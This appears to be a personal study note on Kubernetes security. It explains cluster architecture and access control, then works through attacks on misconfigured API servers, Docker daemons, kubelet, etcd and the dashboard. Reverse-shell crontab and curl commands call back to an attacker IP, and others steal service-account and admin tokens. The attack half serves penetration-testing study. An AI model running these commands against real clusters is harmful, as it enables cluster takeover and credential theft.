k8s security learning

1. Cloud

The definition of cloud may seem vague, but essentially, it's a term used to describe a global network of servers, each of which has a unique function. The cloud is not a physical entity but a vast global network of remote servers connected together and designed to function as a single ecosystem. These servers are designed to store and manage data, run applications, or deliver content/services such as video clips, web mail, office productivity software, or social media. Access files and data not from a local or personal computer, but online from any Internet-enabled device - the information is available when and where it is needed.

Enterprises deploy cloud resources in four different ways. There is a public cloud , which shares resources over the Internet and provides services to the public; a private cloud , which does not share resources and provides services via a private internal network, usually hosted locally; and a hybrid cloud , which combines public and private cloud and a community cloud, which only shares resources between organizations, such as with government agencies.

What is Cloud - Definition - Microsoft Azure

2. What is k8s

k8s is Kubernetes.
It is an open source application developed by Google for container management that helps create and manage containerization of applications.
Use an example to describe: "When the virtualization container Docker has too much to manage, manual management will be very troublesome, so we can use k8s to simplify our management"

0x00 Brief description of K8S architecture

We have already known above that K8S is an application system used to manage virtualized containers. In this section, we will focus on the architecture and implementation principles of K8S.

The following figure is an overview of the K8S architecture:

kubectl is a k8s client tool that can manage clusters using the command line

k8s is mainly composed of fewer master nodes and their corresponding multiple Node nodes. The master is used to control and manage Node nodes, and there must be at least one master node in a k8s cluster.

The Master node contains many components, mainly as follows

etcd  :
It stores configuration information available to each node in the cluster. It is a highly available key-value store that can be distributed across multiple nodes. Only the Kubernetes API server can access it as it may have some sensitive information. This is a distributed key-value store, accessible to all. In short: store node information

API server  :
Kubernetes is an API server that provides all operations on the cluster using the API. An API server implements an interface, which means that different tools and libraries can easily communicate with it. Kubeconfig is a package along with server-side tools that can be used for communication. It exposes the Kubernetes API. In short: the hub of reading and parsing request commands

Controller Manage  :
This component is responsible for regulating the state of the cluster and performing most of the Collector tasks. In general, it can be thought of as a daemon running in a non-terminating loop responsible for collecting information and sending it to the API server. It works to obtain the shared state of the cluster and then make changes to bring the current state of the server to the desired state. The key controllers are Replication Controller, Endpoint Controller, Namespace Controller and Service Account Controller. The controller manager runs different types of controllers to handle nodes, endpoints, etc. In short: maintaining k8s resources

Scheduler  :
This is one of the key components of the Kubernetes master. It is the service in the master server responsible for distributing the workload. It is responsible for tracking the utilization of the workload on the cluster nodes, and then placing and accepting the workload on available resources. In other words, this is the mechanism responsible for assigning pods to available nodes. The scheduler takes care of workload utilization and assigns pods to new nodes. In a nutshell: load balancing scheduler

The Node node also contains many components, mainly as follows

Docker  :
Docker engine, the basic environment running the container

kubelet  :
There is one copy in each node node, mainly to execute instructions on resource operations and responsible for pod maintenance.

kube-proxy  :
proxy service, used for load balancing, load balancing between multiple pods

fluentd  :
log collection service

pod  :
pod is the smallest service unit of k8s, the inside of pod is the container, and k8s operates the container by operating pod . A Node node can have multiple Pods

Pod can be said to be the core part of Node nodes. Pod is also a container, which is a "container for packaging containers". Multiple containers are often loaded in a Pod, and these containers share a virtual environment and share resources such as network and storage.

The resource sharing and mutual interaction of these containers are all done by the pause container in the pod, and a pause container is generated every time a pod is initialized.

0x01 K8S workflow

The general process of issuing client commands is as follows:

  1. kubectl sends a deployment request to the apiserver (e.g. using kubectl create -f deployment.yml)
  2. The apiserver persists the Deployment to etcd; etcd communicates with the apiserver through http.
  3. The controller manager listens to the apiserver through the watch api. After the deployment controller sees a newly created Deplayment object, it pulls it from the queue, creates a ReplicaSet according to the description of the deployment and returns the ReplicaSet object to the apiserver and persists it back to etcd.
  4. Then the scheduler scheduler sees the unscheduled pod object, selects a schedulable node according to the scheduling rules, loads it into the nodeName field in the pod description, and returns the pod object to the apiserver and writes it into etcd.
  5. Kubelet sees that the nodeName field in the pod object belongs to the node, pulls it from the queue, and creates the container described in the pod through the container runtime.

0x02 Build K8S

See "K8S Environment Construction.md"

0x03 The basic concept of k8S

Kubernetes tutorial | Kuboard (very good Chinese tutorial)

Learn the basics of Kubernetes | Kubernetes (k8s official tutorial, with an interactive interface, a little bad is that there is no Chinese in some places)

The following content comes from https://kuboard.cn/learning/k8s-basics/kubernetes-basics.html

Deployment

The Worker node (Node) is a VM (virtual machine) or a physical computer that acts as a working computer in the k8s cluster

Deployment  is translated as  deployment . In k8s, by publishing a Deployment, an instance (docker container) of an application (docker image) can be created. This instance will be included in a   concept called Pod, which is  the smallest manageable unit in k8s.

After the Deployment is released in the k8s cluster, the Deployment will instruct k8s how to create and update application instances, and the master node will schedule the application instances to specific nodes in the cluster.

After application instances are created, they are continuously monitored by the Kubernetes Deployment Controller. If the worker node running the instance shuts down or is deleted, the Kubernetes Deployment Controller will recreate a new instance on another worker node with the most resources in the cluster. This provides a self-healing mechanism to resolve machine failures or maintenance issues.

In the pre-container orchestration era, various setup scripts were commonly used to start applications, but were not capable of recovering applications from machine failures. Kubernetes Deployment provides a completely different way to manage applications by creating application instances and ensuring their number of running instances in the cluster nodes.

Related commands:

kubectl is a k8s client tool that can manage clusters using the command line

kubectl cheat sheet: kubectl cheat sheet | Kubernetes

# 查看 Deployment
kubectl get deployments

# 查看 Pod
kubectl get pods

#根据yaml文件部署
kubectl apply -f nginx-deployment.yaml

A yaml file looks like this: (nginx-deployment.yaml)

apiVersion: apps/v1  #与k8s集群版本有关,使用 kubectl api-versions 即可查看当前集群支持的版本kind: Deployment  #该配置的类型,我们使用的是 Deployment
metadata:          #译名为元数据,即 Deployment 的一些基本属性和信息
	name: nginx-deployment  #Deployment 的名称
    labels:      #标签,可以灵活定位一个或多个资源,其中key和value均可自定义,可以定义多组,目前不需要理解
    	app: nginx  #为该Deployment设置key为app,value为nginx的标签
spec:          #这是关于该Deployment的描述,可以理解为你期待该Deployment在k8s中如何使用  			replicas: 1  #使用该Deployment创建一个应用程序实例
	selector:      #标签选择器,与上面的标签共同作用,目前不需要理解
		matchLabels: #选择包含标签app:nginx的资源
			app: nginx  
	template:      #这是选择或创建的Pod的模板
		metadata:  #Pod的元数据
			labels:  #Pod的标签,上面的selector即选择包含标签app:nginx的Pod
				app: nginx    
		spec:      #期望Pod实现的功能(即在pod中部署)      
			containers:  #生成container,与docker中的container是同一种
			  - name: nginx  #container的名称
			  	image: nginx:1.7.9  #使用镜像nginx:1.7.9创建container,该container默认80端口可访问

PODs and Nodes

Pod container group  is an abstract concept in k8s, which is used to store a group of containers (which can contain one or more container containers, that is, cubes in the figure), and some shared resources of these containers (containers). These resources include:

  • Shared storage, called volumes (Volumes), that is, the purple cylinder on the picture
  • Network, each Pod (container group) has a unique IP in the cluster , and the container (container) in the pod (container group) shares the IP address
  • The basic information of the container (container), such as the image version of the container, the port exposed to the outside world, etc.

POD is the most basic unit on the cluster

A Node (node) in the figure below contains 4 Pods (container groups)

Pods (groups of containers) always  run on Nodes  . Node (node) is a computer in the kubernetes cluster, which can be a virtual machine or a physical machine. Each Node (node) is managed by the master. A Node (node) can have multiple Pods (container groups), and the kubernetes master will automatically schedule Pods (container groups) to the best Node (node) according to the available resources on each Node (node).

The state of a Node node roughly has the following things

  • Addresses: addresses

  • Conditions: status (the conditions field describes the status of all Running nodes)

  • Capacity and Allocatable: Capacity and allocatable, describing the available resources on the node: CPU, memory, and the upper limit of the number of Pods that can be scheduled to the node.

  • Info : General information about the node, such as kernel version, Kubernetes version (kubelet and kube-proxy version), Docker version (if used), and OS name. This information is collected by the kubelet from the nodes.

  • HostName: set by the kernel of the node. Can be overridden by kubelet's --hostname-override parameter.

  • ExternalIP: Typically the node's externally routable (reachable from outside the cluster) IP address.

  • InternalIP: Typically the node's IP address that is only routable inside the cluster.

  • Ready is True if the node is healthy and ready to receive Pods; False indicates that the node is unhealthy and cannot receive Pods; Unknown indicates that the node controller has not received the node's Pod during the latest node-monitor-grace-period (default 40 seconds) information

  • If DiskPressure is True, it means that the free space of the node is not enough to add a new Pod, otherwise it is False

  • If MemoryPressure is True, it means that the node has memory pressure, that is, the available memory of the node is low, otherwise it is False

  • If PIDPressure is True, it means that there is process pressure on the node, that is, there are too many processes on the node; otherwise, it is False

  • If NetworkUnavailable is True, it means that the node network configuration is incorrect; otherwise, it is False

    Related commands:

    #获取类型为Pod的资源列表
    kubectl get pods
    
    #获取类型为Node的资源列表
    kubectl get nodes
    
    # kubectl describe 资源类型 资源名称
    
    #查看名称为nginx-XXXXXX的Pod的信息
    kubectl describe pod nginx-XXXXXX 
    
    #查看名称为nginx的Deployment的信息
    kubectl describe deployment nginx
    
    #查看名称为nginx-pod-XXXXXXX的Pod内的容器打印的日志
    kubectl logs -f podname
    
    #在Pod中运行命令
    kubectl exec -it nginx-pod-xxxxxx /bin/bash
    

Service

https://kuboard.cn/learning/k8s-basics/expose.html#kubernetes-service-service-overview

From the above content, we know that the Pod where the application is located is constantly changing , and the IP of each Pod is different, but for front-end users, the access address of the application should be unique.

Therefore, k8s provides a mechanism to shield the front-end from IP changes caused by back-end Pod changes. This is Service .

Service defines a unified access method for a series of Pods with the same characteristics (the Pods of an application are constantly changing, but these Pods have the same characteristics no matter how they are changed),

Service uses a label selector ( LabelSelector ) to identify which Pods have the same characteristics (POD with a specific Lable label, Lable can be set by the user, and labels exist on all K8S objects and are not limited to Pods) and can be compiled into a container group.

Service has three options to expose the entry of the application, which can be adjusted by setting the spec.type value of the Service item in the application configuration file:

  • ClusterIP (default)

    Publish the service on the internal IP in the cluster. The Service (service) in this way can only be accessed inside the cluster.

  • NodePort

​ Advertise services on the same port on each of the clusters using NAT. In this way, you can access the service by accessing any node + port number in the cluster  <NodeIP>:<NodePort>. At this time, the access mode of ClusterIP is still available.

  • LoadBalancer

​ Create a load balancer outside the cluster in the cloud environment (need to be supported by the cloud provider), and use the IP address of the load balancer as the access address of the service. At this time, the access methods of ClusterIP and NodePort are still available.

In the figure below, there are two services Service A (yellow dotted line) and Service B (blue dotted line). Service A forwards the request to the Pod with IP 10.10.10.1, and Service B forwards the request to 10.10.10.2 and 10.10. On Pods of 10.3 and 10.10.10.4.

Service routes external requests to a set of Pods, which provides an abstraction layer that enables Kubernetes to dynamically schedule container groups without affecting service callers (recreate container groups after container group failures, increase or decrease A Deployment corresponds to the number of container groups, etc.).

On each node there is Kube-proxy service, Service uses it to route links to Pods

Scaling applications

You can set the number of open PODs by changing the replicas item in the deployment configuration file

Earlier, we created a  Deployment , and then  provided access to Pods through services . The Deployment we publish just creates a single Pod to run our application. When the traffic increases and the application POD load increases, we need to scale the application and increase the number of PODs to reduce the load. The access traffic will be forwarded between multiple PODs through load balancing.

Scaling  can be achieved by changing the replicas (number of copies) deployed in the nginx-deployment.yaml file

spec:
  replicas: 2    #使用该Deployment创建两个应用程序实例

Perform a rolling update ( Rolling Update )

When we want to upgrade and update the deployed program, but do not want the program to stop, we can use rolling update to achieve it.

Rolling updates enable zero-downtime updates by gradually replacing older versions of PODs with newer versions of PODs

Rolling update is the default update method of K8S

0x04 k8s user

There are two types of users in a Kubernetes cluster: one is a service account managed by Kubernetes, and the other is an ordinary user.

  • A service account is an account managed by the Kubernetes API. They are all bound to a specific namespace and created automatically by the API server or manually through API calls. The Service account is associated with a set of credentials, which are stored in Secret, and these credentials are mounted to the pod at the same time, allowing calls between the pod and the kubernetes API. ( For the use of service account, see the k8s security section )
  • Use Account (user account): generally refers to a user account managed by other services independent of Kubernetes, such as keys distributed by administrators, user storage (account libraries) such as Keystone, and even user names and Files of password lists, etc. Objects representing such user accounts do not exist in Kubernetes, so they cannot be added directly to the Kubernetes system.

0x05 k8s access control process (security mechanism)

For details, refer to the notes "k8s access control process (security mechanism).md"

All API requests in k8s must be implemented through a gateway, that is, the apiserver component, which is the only access entry for the cluster. The main functions implemented are api authentication + authentication and access control.

Three mechanisms:

  • Authentication : Authentication, that is, identity authentication. Check whether the user is a legitimate user, such as client certificate, password, bootstrap tokens and JWT tokens, etc.
  • Authentication : Authorization, that is, permission judgment. Determine whether the user has the authority for the operation. k8s supports Node, RBAC (Role-Based Access Control), ABAC, webhook and other mechanisms, and RBAC is the mainstream method
  • Admission Control : Admission Control. The last step of the request is generally used to expand functions, such as checking whether the resource of the pod is configured, whether the security of the yaml configuration is compliant, etc. Generally use admission webhooks to achieve

Note: The authentication and authorization process only exists in the HTTPS API. In other words, if the client uses HTTP to connect to the kube-apiserver, authentication and authorization will not be performed

k8s certification

X509 client certs

Client certificate authentication, X509 is a digital certificate format standard, which is the most widely used one in kubernetes by default, and it is also the safest one. When the api-server starts, it will specify the ca certificate and ca private key. As long as it is a client x509 certificate issued by the same ca, it is considered as a trusted client. When kubeadm installs the cluster, it is a certificate-based authentication method.

The user generates kubeconfig in the way of X509 client certs.

Service Account Tokens

Because the authentication method based on x509 is relatively complicated, it is not suitable for the management of pods inside the k8s cluster. Service Account Tokens is the authentication method used by service account. Defines what permissions a pod should have. A pod is associated with a service account, and the service account's credentials (token) are placed in the file system tree of each container in the pod, at/var/run/secrets/kubernetes.io/serviceaccount/token

service account mainly includes three contents: namespace, token and ca

  • namespace: specifies the namespace where the pod is located
  • token: token used for authentication
  • ca: ca is the certificate used to authenticate the apiserver

k8s authentication

K8S currently supports the following four authorization mechanisms:

  • Node
  • ABAC
  • RBAC
  • Webhook

Specifically, there are six authorization modes:

  • The Attribute-Based Access Control (ABAC) pattern allows you to configure policies using local files.
  • The role-based access control (RBAC) pattern allows you to create and store policies using the Kubernetes API.
  • WebHook is an HTTP callback pattern that allows you to manage authentication using remote REST endpoints.
  • Node node authentication is a special-purpose authentication mode that performs authentication on API requests sent by kubelet.
  • AlwaysDeny blocks all requests. Use this flag only for testing.
  • AlwaysAllow allows all requests. Use this flag only if you don't need authentication for API requests.

Multiple authentication modules can be selected. Modules are checked in order so that earlier modules have higher priority to allow or deny requests.

From version 1.6, Kubernetes enables RBAC access control policy by default. RBAC has been included as a stable feature since 1.8.

3. K8S attack matrix

CDK is a penetration testing tool customized for the container environment. It provides zero-dependent common commands and PoC/EXP inside the compromised container. Integrate escape, lateral movement, persistent utilization methods unique to Docker/K8s scenarios, and plug-in management.

https://github.com/cdk-team/CDK

The following figure is some attack matrix of K8S

This article revolves around this framework and describes some useful attack techniques.

0x00 Information collection in the k8s environment

Information collection is inseparable from our attack scenario or the starting point of the entered intranet. Generally speaking, the intranet will not be built entirely based on container technology. Therefore, the starting point can generally be divided into containers with restricted permissions and the intranet of physical hosts.

The internal cluster network of K8s mainly relies on network plug-ins. At present, the most used ones are Flannel and Calico.

There are mainly 4 types of communication:

  • Inter-container communication within the same Pod
  • Pods communicate with each other
  • Communication between Pod and Service
  • Traffic outside the cluster and communication between services

When our starting point is a container with limited permissions inside the k8s cluster, it is not much different from regular intranet penetration, just upload the port scanning tool for detection.

Common ports of k8s

In the k8s environment, the ports that can be highly concerned by intranet detection: (The penetration of each port will be expanded below)

kube-apiserver: 6443, 8080
kubectl proxy: 8080, 8081
kubelet: 10250, 10255, 4149
dashboard: 30000
docker api: 2375
etcd: 2379, 2380
kube-controller-manager: 10252
kube-proxy: 10256, 31442
kube-scheduler: 10251
weave: 6781, 6782, 6783
kubeflow-dashboard: 8080

0x01 initial access

1. Cloud account AK leaked

In today's cloud environment, if many business codes want to communicate with cloud services, they need to authenticate through the accesskey. Only after passing the authentication can they communicate with cloud services.
Generally speaking, if people want to access a service, they often need to provide a password for authentication; while codes want to access a cloud service API, they need to provide an accesskey for authentication.
If the accesskey is leaked, we can use this accesskey to communicate with the cloud service, bounce back from the shell of the cloud host and use it as the entry point to slowly enter.

The following article is a more detailed discussion on accesskey security in cloud native security. After reading it, you can have a deeper understanding of the concept of accesskey.

Discussion on cloud security due to access key leak- FreeBuf Network Security Industry Portal

Remember an Alibaba Cloud host leaked the Access Key to Getshell - FreeBuf Network Security Industry Portal

2. Malicious mirror image

In docker, the establishment of the container depends on the image. If the image obtained by pulling is a malicious image, or the image obtained by pulling itself has security vulnerabilities, it will bring security risks.

The picture below is a malicious image of mining software deployed on dockerhub, which will download malicious mining software from github for mining

3. The API Server is not authorized (8080, 6443)

It is a classic vulnerability in K8S

Review the role of the API Server, which is used in the cluster to provide APIs to control the interior of the cluster. If we can control the API Server, it means that we can use kubectl to create Pods and use disk mounting technology to obtain Node node control. (The technique of obtaining the node shell by disk mounting will be discussed in detail in a later section).

API Server can provide external services on two ports: 8080 (insecure-port, non-secure port) and 6443 (secure-port, secure port), of which port 8080 provides HTTP services without authentication, and port 6443 provides HTTPS services And it supports identity authentication (ports 8080 and 6443 are not fixed, they are controlled through configuration files).

insecure-port open

The service opened by API Server on port 8080 should be used for testing, but if it is exposed in the living environment, attackers can use this port to attack the cluster.

However, the prerequisites for unauthorized activities using port 8080 of the API Server are somewhat harsh (misconfiguration + lower version), port 8080 service is not started by default, but if the user has configuration items  /etc/kubernets/manifests/kube-apiserver.yaml in  --insecure-port=8080the port, there is a security risk.

Note: This option has been disabled after version 1.20

Environmental prerequisites:

step1:进入cd /etc/kubernetes/manifests/
step2: 修改api-kube.conf
	添加- -–insecure-port=8080
	添加- -–insecure-bind-address=0.0.0.0

Kubelet 会监听该文件的变化,当您修改了 /etc/kubernetes/manifests/kube-apiserver.yaml 文件之后,kubelet 将自动终止原有的 kube-apiserver-{nodename} 的 Pod,并自动创建一个使用了新配置参数的 Pod 作为替代

restart service

systemctl daemon-reload
systemctl restart kubelet

In the actual environment, because port 8080 is relatively common, this risk point is often overlooked in internal investigations.

use

Environmental information:

A cluster consists of three nodes, including a control node and two worker nodes

  • K8s-master 192.168.11.152
  • K8s-node1 192.168.11.153
  • K8s-node2 192.168.11.160

attack aircraft kali

  • 192.168.11.128

Direct access to port 8080 will return a list of available APIs:

Use kubectl to specify the IP and port to call the API Server with unauthorized vulnerabilities.

If you don’t have kubectl, you need to install kubectl. For installation, please refer to the official website documentation:

Use kubectl to get cluster information:

kubectl -s ip:port get nodes

Note: If your kubectl version is higher than that of the server, an error will occur and you need to lower the kubectl version.

Then create a new yaml file on this machine to create a container, and mount the root directory of the node to the /mnt directory of the container, the content is as follows:

apiVersion: v1
kind: Pod
metadata:
  name: test
spec:
  containers:
  - image: nginx
    name: test-container
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /

Then use kubectl to create the container. At this time, we found that it is impossible to specify which node to create the pod on.

kubectl -s 192.168.11.152:8080 create -f test.yaml
kubectl -s 192.168.11.152:8080 --namespace=default exec -it test bash


Timing task written to rebound shell

echo -e "* * * * * root bash -i >& /dev/tcp/192.168.11.128/4444 0>&1\n" >> /mnt/etc/crontab

Wait a while to get node02 node permissions:


Or you can also control the host by writing public and private keys.

If the apiserver is configured with a dashboard, pods can be created directly through the ui interface.

secure-port misconfiguration

If we access the secure-port port of the API server without any credentials, it will be marked as a system:anonymoususer by the server by default.

Generally speaking system:anonymous, user permissions are very low, but if the operation and maintenance personnel mismanage and bind system:anonymoususers to cluster-adminuser groups, it means that secure-port allows anonymous users to issue commands to the cluster with administrator permissions. (That is, the secure-port becomes an insecure-port in a certain sense)

use

method one

kubectl -s https://192.168.111.20:6443/ --insecure-skip-tls-verify=true get nodes

#(192.168.111.20:6443 是master节点上apiserver的secure-port)然后提示输入账户密码,随便乱输就行

It should be like this

But if the secure-port is improperly configured and unauthorized, it will be like this

Method Two

Use the cdk tool to try to log in through "system:anonymous"an anonymous account

./cdk kcurl anonymous get "https://192.168.11.152:6443/api/v1/nodes"

Create a privileged container:

The subsequent attack method is the same as above

4. k8s configfile leaked

There may be sensitive information such as api-server login credentials in the k8s configfile configuration file. If the content of the cluster configfile is obtained (such as leaked on github), it will have a huge impact on the internal security of the cluster.

Here is a picture from the Aliyun community

5. Application vulnerability intrusion inside the container

As the name implies, there is a problem with the internal application of the container (for example, the internal application is tomcat, and there is an RCE vulnerability), which will cause the hacker to obtain the Pod shell and the entry point

6. docker.sock utilization

Docker works in the form of server-client, the server is called Docker daemon, and the client is called docker client.
If the Docker daemon wants to call the docker command, it needs to communicate with the docker client through the docker.sock file. In other words, the Docker daemon manages the docker container through the docker.sock file (such as creating a container, executing commands in the container, querying the status of the container, etc.).
At the same time, Docker daemon can also expose docker.sock on the port through configuration. Generally, port 2375 is used for unauthenticated HTTP communication, and port 2376 is used for trusted HTTPS communication.

Public network exposure (2375) (Docker Daemon)

If port 2375 of the docker daemon is exposed on the public network, you can directly use this port to control the docker container, and obtain host permissions by creating a new container with disk mounting technology.

fofa search

server="Docker" && port="2375"

It can be found that there are many docker.socks exposed on the public network,

we pick one to test the waters

It can be found that the API was successfully called to query the container status

Then we can execute the command inside the specified container through the following command

curl -X POST "http://ip:2375/containers/{container_id}/exec" -H "Content-Type: application/json" --data-binary '{"Cmd": ["bash", "-c", "bash -i >& /dev/tcp/xxxx/1234 0>&1"]}'

get an id

Then request this id and execute this command

curl -X POST "http://ip:2375/exec/{id}/start" -H "Content-Type: application/json" --data-binary "{}"

Like this: (picture quoted from freebuf)

Directly use the ready-made docker.sock

If we invade a docker container, which contains docker.sock (common path /var/run/docker.sock), then we can directly use this file to control the docker daemon.

Just change the command in the previous section and add a --unix-socket parameter.

curl -s --unix-socket /var/run/docker.sock -X POST "http://docker_daemon_ip/containers/{container_id}/exec" -H "Content-Type: application/json" --data-binary '{"Cmd": ["bash", "-c", "bash -i >& /dev/tcp/xxxx/1234 0>&1"]}'

curl -s --unix-socket /var/run/docker.sock -X POST "http://docker_daemon_ip/exec/{id}/start" -H "Content-Type: application/json" --data-binary "{}"

Generally speaking, docker.sock exists on the docker daemon server, but if developers want to run docker commands in the docker container, they need to mount the host’s docker.sock inside the container, which gives us docker escape opportunity.

Practical case

Detection and utilization of Docker Daemon unauthorized access:

#探测是否访问未授权访问
curl http://192.168.238.129:2375/info
docker -H tcp://192.168.238.129:2375 info


#推荐使用这种方式,操作方便。
export DOCKER_HOST="tcp://192.168.238.129:2375" 

Docker Daemon unauthorized combat cases:

7. Kubelet is not authorized (10250/10255)

harm:

  • Can directly control all pods under the node
  • Search to find privileged containers and get Token
  • If you can get a high-privilege token from the pod, you can take over the cluster directly.

What is the difference between kubelet and kubectl?

Kubelet is used to manage local Pods on Node, and kubectl is used to manage clusters. kubectl issues instructions to the cluster, and the kubelet on the Node manages the local Pod after receiving the instructions.

The Kubelet API generally listens on two ports: 10250 and 10255. Among them, port 10250 is readable and writable, and port 10255 is a read-only port.

The API port corresponding to kubelet is 10250 by default, and it runs on each Node in the cluster. If the kubelet configuration file is on the node, /var/lib/kubelet/config.yaml
we focus on these two options in the configuration file: the first option is used to set whether the kubelet API can be accessed Anonymous access, the second option is used to set whether the kubelet api access needs to be authorized by the Api server (so that even if anonymous users can access, they do not have any permissions).

By default, the kubelet configuration file is as shown in the figure above. If we directly access the corresponding API port of kubelet, the authentication will fail

In the configuration file, we change authentication-anonymous-enabled to true, authorization-mode to AlwaysAllow, and then use the command systemctl restart kubelet to restart kubelet, then we can realize kubelet unauthorized access

There are also the following configurations about authorization-mode:

--authorization-mode=ABAC 基于属性的访问控制(ABAC)模式允许你 使用本地文件配置策略。
--authorization-mode=RBAC 基于角色的访问控制(RBAC)模式允许你使用 Kubernetes API 创建和存储策略。
--authorization-mode=Webhook WebHook 是一种 HTTP 回调模式,允许你使用远程 REST 端点管理鉴权。
--authorization-mode=Node 节点鉴权是一种特殊用途的鉴权模式,专门对 kubelet 发出的 API 请求执行鉴权。
--authorization-mode=AlwaysDeny 该标志阻止所有请求。仅将此标志用于测试。
--authorization-mode=AlwaysAllow 此标志允许所有请求。仅在你不需要 API 请求 的鉴权时才使用此标志。

After we find that kubelet is not authorized, we can do the following to get the entry point

Execute commands in Pod

If kubelet is not authorized, you can use the following command to execute the command in the Pod

curl -XPOST -k https://node_ip:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=command"

The parameters can  be obtained from https://node_ip:10250/pods

  • The value under metadata.namespace is namespace
  • The value under metadata.name is pod_name
  • The name value under spec.containers is container_name

You can directly echo the command result, which is very convenient

Get the service account credentials in the container

If you can execute commands in the Pod, you can obtain the service account credentials in the Pod. Using the service account credentials on the Pod can be used to simulate the service account on the Pod for operations. See the following section for specific usage methods: [Using Service Account Connect to API Server to execute instructions](#Use Service Account to connect to API Server to execute instructions)

Example of use

Environmental information:

A cluster consists of three nodes, including a control node and two worker nodes

  • K8s-master 192.168.11.152
  • K8s-node1 192.168.11.153
  • K8s-node2 192.168.11.160

attack aircraft kali

  • 192.168.11.128

Visit https://192.168.11.160:10250/pods, the following data appears to indicate that it can be used:

If we want to execute commands in the container, we need to first determine the parameters of namespace, pod_name, and container_name to confirm the location of the container.

  • The value under metadata.namespace is namespace
  • The value under metadata.name is pod_name
  • The name value under spec.containers is container_name

Here you can quickly find the privileged container by retrieving the securityContext field

Execute the command in the corresponding container to obtain the token, which can be used for Kubernetes API authentication. Kubernetes uses RBAC authentication by default (when using the kubectl command, the bottom layer actually calls the Kubernetes API through certificate authentication)

The token is stored in the pod by default/var/run/secrets/kubernetes.io/serviceaccount/token

curl -k -XPOST "https://192.168.11.160:10250/run/kube-system/kube-flannel-ds-dsltf/kube-flannel" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"

If the token mounted in the cluster has the authority to create a pod, you can access the cluster API through the token to create a privileged container, and then escape to the host through the privileged container, so as to have the authority of the cluster node

kubectl --insecure-skip-tls-verify=true --server="https://192.168.11.152:6443" --token="eyJhb....." get pods

The next step is to mount the directory by creating a pod, and then use crontab to get the shell.

8. etcd Unauthorized (2379)

etcd is a database component in the k8s cluster. It listens on port 2379 by default and passes certificate authentication by default. It mainly stores node information, such as some tokens and certificates. If 2379 is not authorized, then you can query the token of the administrator in the cluster through etcd, and then use this token to access the api server to take over the cluster.

There are two versions of etcd, v2 and v3, and k8s uses the v3 version, so we need to use commands ETCDCTL_API=3to specify the etcd version when accessing etcd.

We want to use etcd unauthorized, we need to use a tool called etcdctl, it is used to manage etcd database, we can download it on github

Releases · etcd-io/etcd · GitHub

"When starting etcd, if the --client-cert-auth parameter is not specified to enable certificate verification, and access control is not implemented through iptables/firewall, etcd's interface and data will be directly exposed to external hackers" - iQIYI Security Emergency Response Center

use

Download etcd: Releases etcd-io/etcd GitHub

After decompression, enter the etcd directory on the command line.

etcdctl api version switching:

export ETCDCTL_API=2
export ETCDCTL_API=3

Detect for unauthorized access to the Client API

etcdctl --endpoints=https://172.16.0.112:2379 get / --prefix --keys-only

If we directly access port 2375 without a certificate file, the etcd application cannot be invoked, and an X509 certificate error will be prompted.

We need to add the following files to the environment variables (ca, key, cert) to access (if unauthorized, you can access without certificate)

export ETCDCTL_CERT=/etc/kubernetes/pki/etcd/peer.crt
export ETCDCTL_CACERT=/etc/kubernetes/pki/etcd/ca.crt
export ETCDCTL_KEY=/etc/kubernetes/pki/etcd/peer.key

Or execute directly:

etcdctl --insecure-skip-tls-verify --insecure-transport=true --endpoints=https://172.16.0.112:2379 --cacert=ca.pem --key=etcd-client-key.pem --cert=etcd-client.pem endpoint health

Query administrator token

We can directly query the administrator's token in etcd, and then use the token to cooperate with the kubectl command to take over the cluster.

etcdctl --endpoints=https://etcd_ip:2375/ get / --prefix --keys-only | grep /secrets/

If there is a sensitive account in the query result, we can get his token

etdctl --endpoints=https://etcd_ip:2375/ get /registry/secrets/default/admin-token-55712

After getting the token, use kubectl to take over the cluster

kubectl --insecure-skip-tls-verify -s https://master_ip:6443/ --token="xxxxxx" get nodes

kubectl --insecure-skip-tls-verify -s https://master_ip:6443/ --token="xxxxxx" -n kube-system get pods

You can also try to dump the etcd database and find sensitive information

ETCDCTL_API=3 ./etcdctl --endpoints=http://IP:2379/ get / --prefix --keys-only

If the server has https enabled, you need to add two parameters to ignore certificate verification --insecure-transport --insecure-skip-tls-verify

ETCDCTL_API=3 ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://IP:2379/ get / --prefix --keys-only

9. Private mirror library exposed

For example, if many of an enterprise's cloud applications are built with self-built private images, and one day its private images are leaked, we can use auditing and other means to dig out the loopholes in the private images, resulting in Supply chain hit.

10. Dashboard panel blasting

Dashboard is a graphical interface officially launched by Kubernetes to control Kubernetes. In the case that improper configuration of Kubernetes leads to an unauthorized access vulnerability of dashboard, we can control the entire cluster through dashboard.

  • When enable-skip-login is enabled, the user can click Skip on the login interface to skip login and enter the dashboard.
  • Bind cluster-admin to Kubernetes-dashboard (cluster-admin has the highest authority to manage the cluster).

use

The default configuration login requires the input of Token and cannot be skipped

However, if the following parameters are added to the configuration parameters, the Token input link can be skipped during the login process

- --enable-skip-login

Clicking Skip to enter the dashboard actually uses the ServiceAccount of Kubernetes-dashboard. If the ServiceAccount is not configured with special permissions at this time, there is no way to control any function of the cluster by default.

Bind cluster-admin to Kubernetes-dashboard:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: dashboard-1
subjects:
- kind: ServiceAccount
  name: k8s-dashboard-kubernetes-dashboard
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io

After the binding is complete, refresh the dashboard interface again, and you can see the resources of the entire cluster.

Create a privileged container directly after obtaining access to getshell

0x02 execute

directory mount escape

This technology is an attack method that combines execution, persistence, and privilege escalation. To save trouble, I will put it here.

First, after we have gained control of the api server, we can create pods and execute commands inside the pods. If we mount the root directory of the Node node to a certain directory of the Pod when creating the Pod, since we can execute commands inside the Pod, we can modify the contents of the files in the root directory of the Node node mounted under the Pod , if we write malicious crontab, web shell, and ssh public key, we can escape from the Pod to the host Node and gain control of Node.

The specific reproduction is as follows

First create a malicious Pod

首先我们创建恶意Pod,可以直接创建Pod,也可以用Deployment创建。

既然提到创建Pod,那么就多提一句:直接创建Pod和用Deployment创建Pod的区别是什么?
Deployment可以更方便的设置Pod的数量,方便Pod水平扩展。
Deployment拥有更加灵活强大的升级、回滚功能,并且支持滚动更新。
使用Deployment升级Pod只需要定义Pod的最终状态,k8s会为你执行必要的操作。

如果创建一个小玩意,那么直接创建Pod就行了,没必要用deployment。
用Pod创建
